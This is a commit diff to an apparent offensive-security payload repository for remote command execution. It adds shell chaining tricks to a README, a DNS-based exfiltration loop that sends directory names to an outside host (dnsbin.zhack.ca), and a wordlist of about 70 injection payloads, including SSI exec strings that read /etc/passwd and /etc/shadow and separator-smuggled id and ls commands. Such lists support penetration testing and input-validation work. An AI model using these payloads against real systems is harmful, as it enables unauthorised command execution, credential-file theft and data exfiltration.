LDAP & XPATH injection + Small fixes and payloads

Remote commands execution/README.md

@@ -17,10 +17,14 @@ Code execution by chaining commands
 original_cmd_by_server; ls
 original_cmd_by_server && ls
 original_cmd_by_server | ls
+original_cmd_by_server `ls`
 ```
 
 Code execution without space - Linux
 ```
+swissky@crashlab:~/Www$ cat</etc/passwd
+root:x:0:0:root:/root:/bin/bash
+
 swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
@@ -60,6 +64,15 @@ user	0m0.000s
 sys	0m0.000s
 ```
 
+
+## DNS based data exfiltration
+Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca
+```
+1. Go to http://dnsbin.zhack.ca/
+2. Execute a simple 'ls'
+for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
+```
+
 ## Environment based
 NodeJS Code execution
 ```

Remote commands execution/command-execution-unix.txt

@@ -0,0 +1,70 @@
+<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
+<!--#exec%20cmd="/usr/bin/id;-->
+<!--#exec%20cmd="/usr/bin/id;-->
+/index.html|id|
+;id;
+;id
+;netstat -a;
+;id;
+|id
+|/usr/bin/id
+|id|
+|/usr/bin/id|
+||/usr/bin/id|
+|id;
+||/usr/bin/id;
+;id|
+;|/usr/bin/id|
+\n/bin/ls -al\n
+\n/usr/bin/id\n
+\nid\n
+\n/usr/bin/id;
+\nid;
+\n/usr/bin/id|
+\nid|
+;/usr/bin/id\n
+;id\n
+|usr/bin/id\n
+|nid\n
+`id`
+`/usr/bin/id`
+a);id
+a;id
+a);id;
+a;id;
+a);id|
+a;id|
+a)|id
+a|id
+a)|id;
+a|id
+|/bin/ls -al
+a);/usr/bin/id
+a;/usr/bin/id
+a);/usr/bin/id;
+a;/usr/bin/id;
+a);/usr/bin/id|
+a;/usr/bin/id|
+a)|/usr/bin/id
+a|/usr/bin/id
+a)|/usr/bin/id;
+a|/usr/bin/id
+;system('cat%20/etc/passwd')
+;system('id')
+;system('/usr/bin/id')
+%0Acat%20/etc/passwd
+%0A/usr/bin/id
+%0Aid
+%0A/usr/bin/id%0A
+%0Aid%0A
+& ping -i 30 127.0.0.1 &
+& ping -n 30 127.0.0.1 &
+%0a ping -i 30 127.0.0.1 %0a
+`ping 127.0.0.1`
+| id
+& id
+; id
+%0a id %0a
+`id`
+$;/usr/bin/id